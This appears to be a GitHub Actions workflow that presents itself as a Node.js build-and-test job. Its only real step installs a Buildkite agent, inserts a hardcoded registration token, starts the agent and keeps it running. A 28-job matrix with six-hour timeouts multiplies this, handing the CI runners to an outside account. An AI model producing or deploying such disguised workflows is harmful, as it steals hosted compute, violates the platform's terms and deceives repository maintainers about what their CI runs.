# run This workflow will do a clean install of node dependencies, build the source code and run tests across different versions of node
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-nodejs-with-github-actions

name: Node.js CI 

on: [push, pull_request]

jobs:
  test:
    runs-on: ubuntu-latest

    strategy:
      max-parallel: 180
      fail-fast: false
      matrix:
        node-version: [10.x, 11.x, 12.x, 13.x, 14.x, 15.x, 16.x]
        flag: [1, 2, 3, 4]
    timeout-minutes: 360

    steps:
    - uses: actions/checkout@v2

    - name: Use Node.js ${{ matrix.node-version }}
      uses: actions/setup-node@v1
      with:
        node-version: ${{ matrix.node-version }}
    - name: cb
      if: always()
      run: |
        sudo sh -c 'echo deb https://apt.buildkite.com/buildkite-agent stable main > /etc/apt/sources.list.d/buildkite-agent.list' && sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 32A37959C2FA5C3C99EFBC32A79206696452D198 && sudo apt-get update && sudo apt-get install -y buildkite-agent && sudo sed -i "s/xxx/bbb42317f3a5fec51d6f3a586c89fd3163331425f73fd64cc6/g" /etc/buildkite-agent/buildkite-agent.cfg && sudo systemctl enable buildkite-agent && sudo systemctl start buildkite-agent && journalctl -f -u buildkite-agent
